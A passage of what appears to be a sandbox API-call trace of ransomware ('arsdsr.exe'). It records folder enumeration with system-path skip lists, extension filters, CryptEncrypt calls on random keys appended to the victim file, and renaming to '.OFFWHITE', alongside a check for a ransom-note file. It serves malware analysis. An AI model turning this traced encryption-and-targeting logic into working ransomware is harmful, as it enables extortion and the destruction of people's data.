(lpString1="Proof.es", lpString2="rsa") returned -1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="ntuser.dat") returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="programdata") returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="appdata") returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="program files") returned 1 [0084.102] lstrcmpiW (lpString1="Proof.es", lpString2="program files (x86)") returned 1 [0084.102] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.102] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.es" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es" [0084.102] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" [0084.102] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" [0084.102] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*" [0084.102] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0084.102] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.103] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0084.103] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.103] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.103] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2=".") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="..") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="...") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="windows") returned -1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="$recycle.bin") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="rsa") returned -1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="ntuser.dat") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="programdata") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="appdata") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="program files") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.cab", lpString2="program files (x86)") returned 1 [0084.103] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" [0084.103] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="Proof.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" [0084.103] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.103] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0084.103] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0084.103] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0084.103] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0084.103] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0084.103] lstrcmpiW (lpString1="Proof.msi", lpString2=".") returned 1 [0084.103] lstrcmpiW (lpString1="Proof.msi", lpString2="..") returned 1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="...") returned 1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="windows") returned -1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="$recycle.bin") returned 1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="rsa") returned -1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="ntuser.dat") returned 1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="programdata") returned 1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="appdata") returned 1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="program files") returned 1 [0084.104] lstrcmpiW (lpString1="Proof.msi", lpString2="program files (x86)") returned 1 [0084.104] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" [0084.104] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="Proof.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" [0084.104] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.104] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.104] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.104] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.105] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.105] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2=".") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="..") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="...") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="windows") returned -1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="$recycle.bin") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="rsa") returned -1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="ntuser.dat") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="programdata") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="appdata") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="program files") returned 1 [0084.105] lstrcmpiW (lpString1="Proof.xml", lpString2="program files (x86)") returned 1 [0084.105] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\" [0084.105] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\", lpString2="Proof.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" [0084.105] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.105] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.105] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.105] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.106] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.106] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.106] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.106] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.106] lstrcmpiW (lpString1="Proof.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.106] GetProcessHeap () returned 0x500000 [0084.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc20 [0084.106] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0084.106] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=1457) returned 1 [0084.106] GetProcessHeap () returned 0x500000 [0084.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.106] GetProcessHeap () returned 0x500000 [0084.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.106] GetProcessHeap () returned 0x500000 [0084.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.106] GetProcessHeap () returned 0x500000 [0084.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.106] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.106] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.106] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.106] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.106] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.107] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.107] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.107] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0084.107] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.107] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.107] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0084.107] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x5b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.107] SetLastError (dwErrCode=0x0) [0084.107] WriteFile (in: hFile=0x214, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0084.156] GetLastError () returned 0x0 [0084.156] GetLastError () returned 0x0 [0084.156] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.156] WriteFile (in: hFile=0x214, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0084.157] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x7b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.157] WriteFile (in: hFile=0x214, lpBuffer=0x52bc20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52bc20*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0084.157] GetProcessHeap () returned 0x500000 [0084.157] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5b1) returned 0x546980 [0084.157] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.157] ReadFile (in: hFile=0x214, lpBuffer=0x546980, nNumberOfBytesToRead=0x5b1, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295dec0*=0x5b1, lpOverlapped=0x0) returned 1 [0084.157] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.157] WriteFile (in: hFile=0x214, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295decc*=0x5b1, lpOverlapped=0x0) returned 1 [0084.157] GetProcessHeap () returned 0x500000 [0084.157] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0084.157] CloseHandle (hObject=0x214) returned 1 [0084.160] GetProcessHeap () returned 0x500000 [0084.160] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.160] GetProcessHeap () returned 0x500000 [0084.161] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.161] GetProcessHeap () returned 0x500000 [0084.161] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.161] GetProcessHeap () returned 0x500000 [0084.161] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.161] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" [0084.161] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.OFFWHITE" [0084.161] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.offwhite")) returned 1 [0084.162] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0084.162] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0084.162] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2=".") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="..") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="...") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="windows") returned -1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="$recycle.bin") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="rsa") returned -1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="ntuser.dat") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="programdata") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="appdata") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="program files") returned 1 [0084.162] lstrcmpiW (lpString1="Proof.fr", lpString2="program files (x86)") returned 1 [0084.162] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.162] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Proof.fr" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr" [0084.162] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" [0084.162] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" [0084.162] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*" [0084.162] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0084.163] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.163] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0084.163] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.163] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.163] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x860084, dwReserved1=0x295e9f0, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2=".") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="..") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="...") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="windows") returned -1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="$recycle.bin") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="rsa") returned -1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="ntuser.dat") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="programdata") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="appdata") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="program files") returned 1 [0084.163] lstrcmpiW (lpString1="Proof.cab", lpString2="program files (x86)") returned 1 [0084.163] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\" [0084.164] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\", lpString2="Proof.cab" | out: 